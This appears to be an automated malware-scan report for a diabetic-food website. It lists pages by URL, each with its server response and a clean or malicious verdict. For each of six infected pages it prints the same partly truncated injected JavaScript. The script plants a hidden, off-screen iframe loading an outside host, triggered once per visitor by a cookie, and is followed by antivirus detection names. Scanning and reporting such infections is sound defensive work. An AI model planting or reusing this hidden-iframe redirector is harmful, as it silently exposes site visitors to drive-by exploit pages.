Request | Server response | Status |
http://diabeticfoodtoheal.org/ | 200 OK Content-Length: 6333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://diabeticfoodtoheal.org/index.html | 200 OK Content-Length: 6333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://diabeticfoodtoheal.org/food.html | 200 OK Content-Length: 4277 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://diabeticfoodtoheal.org/faq.html | 200 OK Content-Length: 3412 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://diabeticfoodtoheal.org/shipping.html | 200 OK Content-Length: 3403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://diabeticfoodtoheal.org/contact.html | 200 OK Content-Length: 3496 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hll09() { var static='ajax'; var controller='index.php'; var hll = document.createElement('iframe'); hll.src = 'http://lisboadesign.com/disobeying/gpresult.php'; hll.style.position = 'absolute'; hll.style.color = '961'; hll.style.height = '961px'; hll.style.width = '961px'; hll.style.left = '1000961'; hll.style.top = '1000961'; if (!document.getElementById('hll')) { document.write('<p id=\'hll\' class=\'hll09\' ></p>'); document.getElementById('hll').appendChild(hll); }}func
... 335 bytes are skipped ...( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');hll09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Ikarus
- Trojan.JS.IFrame
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Comodo
- UnclassifiedMalware
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/JSRedir-MB
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://form.jotform.us/jsform/21424878027153 | 200 OK Content-Length: 12085 Content-Type: text/javascript | clean |
http://diabeticfoodtoheal.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |